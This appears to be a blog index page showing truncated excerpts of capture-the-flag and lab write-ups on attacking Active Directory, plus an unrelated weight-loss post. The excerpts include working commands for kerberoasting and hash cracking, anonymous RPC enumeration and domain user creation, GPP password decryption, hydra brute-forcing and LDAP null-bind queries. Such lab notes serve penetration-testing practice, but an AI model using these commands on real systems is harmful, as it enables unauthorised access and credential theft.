Posts

Scrambled - HTB

This is an Active Directory box based on the ports open. Navigate to the supportrequest page. We see two potential users exist: support and ksimpson. The domain scramblecorp.com can be added to the /etc/hosts file too. The username and password are ksimpson/ksimpson. We see NTLM is disabled based on this hard-to-read and easily-missed notification message. GetUserSPNs.py is broken. Please fix with a local copy: https://github.com/SecureAuthCorp/impacket/issues/1206
impacket-getTGT scrm.local/ksimpson:ksimpson
export KRB5CCNAME=ksimpson.ccache
so impacket can use the ticket.
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
The password is pegasus60. Which fits for UCF right. Get a PDF document from samba. We can pass the ksimpson TGT ticket to login.
smbclient.py scrm.local/ksimpson:ksimpson@dc1.scrm.local -dc-ip scrambled.htb -debug -k
Next let's use ticketer.py. https://www.browserling.com/tools/ntlm-hash . Take Pegasus60 and get a NTL...

PG Mice

I haven't seen these ports before. The aggressive nmap scan doesn't give much information. I google the 1978 port. Since the box is called "Mice" and the exploit is called "RemoteMouse", it tips me off. I look into the exploit and see the SIN 15WIN NOP NOP text. This must be it. I edit the script and realize the issues are because this is python2. I run python2 exploit.py and it works. I download a faster exploit script too. I try multiple reverse shells and fail. I throw my hands up and do the "Give Up! Download netcat and use that instead!" step. I get shell on the box.

2 months and 17 pounds

Weight Gain during the Pandemic
I gained an extra 20 pounds during the pandemic. It happened within a month or two while I wasn't paying attention. I was blindsided. I woke up one day and didn't know how I got myself there. I've never lost weight successfully. I can maintain, lose a little, and that's it. Which is all I needed to do until 2020.
Too Many Failures to Count
I've been struggling with this for two years. I started and stopped many diets. I found the calories in/calories out method doesn't work for me. If I eat 1200 calories, I gain weight. If I repeat that over and over, I gain weight. The low calories made me feel hungry and weak. Maybe it works for men. I tried working out a lot. This just made me gain too. I could walk/run 20-30K steps and gain weight. I wasn't eating that bad either. I ate whole food vegetables and fruits. It worked for the first 4 pounds and stopped. I'm already a vegan. I tried intermittent fasting...

RPC: It's Actually Useful Jutsu

Where have I seen RPC be useful? Need to collect usernames to brute-force. Request a TGS-Ticket by username ONLY: AS-REP Kerberoasting. A password was left in the AD User Description. https://www.hackingarticles.in/active-directory-enumeration-rpcclient/
1. Login with RPC
rpcclient -U "" -N 10.10.10.161
1. enumdomusers
2. queryuser
queryuser svc-alfresco
3. enumdomgroups and querygroup
enumdomgroups
querygroup 0x200
querygroupmem 0x200 (get the group member IDs)
4. Get Password Info
rpcclient $> getdompwinfo
min_password_length: 7
password_properties: 0x00000000
5. Create a User (Need priv)
createdomuser hacker
setuserinfo2 hacker 24 Password@1
enumdomusers

Active HTB Active Directory

smbget -R smb://anonymous:anonymous@10.10.10.100/Replication
Run smbget to retrieve all the files. Find Group.xml located in active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Group.xml. Run gpp-decrypt on the cPassword hash. Logging in is not working. However kerberoasting and secretdump can still work.
Trying Stuff Out (Not related to solving this box)
Nice little samba server trick works when downloading fails ^
Lessons Learned
See SYSVOL? Have access to SYSVOL? Older box? GPP Password Decryption may work. Group.xml is the file to look for. Used kerberoasting. GPP good for pre and post exploit. Found smbget command.

PG Hutch: Active Directory

I was stuck on this box for two days. My MiTM attacks did not work. Traffic is dead. Restarting the box usually triggers the IPv6 poisoning MiTM. Does not work. Next step is Samba exploits. No vulns there. Which leaves us to 'what next'? This is a great box to collect more enumeration skills and attack vectors. The obvious WebDav keeps screaming at me. It has a BasicAuth on it. I find out you can enumerate users with Kerbrute. I try that. I get "admin" (custom) and "Administrator" (default). I don't know how to brute BasicAuth. I google "how to brute WebDav" which is a bad google. I corrected to "how to brute BasicAuth". I get a hydra command. I run that against multiple password lists with the user "admin". No luck. IT WOULD however work, and is good to keep for the future.
hydra -l fmcsorley -P passwords.txt 192.168.210.122 http-get / -I
Follow these two articles when enumerating LDAP: https://book.hac...

Attack Active Directory: Enumeration

MITM and Samba exploits not working?
1. Kerberos Username Enumeration
Download Here: https://github.com/ropnop/kerbrute/releases . Install, chmod the file, that's it.
2. LDAP Enumeration
Check out: https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap and https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/
>>> import ldap3
>>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
>>> connection.bind()
True
>>> server.info
>>> connection.search(search_base='DC=vault,DC=offsec', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
>>> connection.entries
>>> connection.search(search_base='DC=htb,DC=local', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword')
>...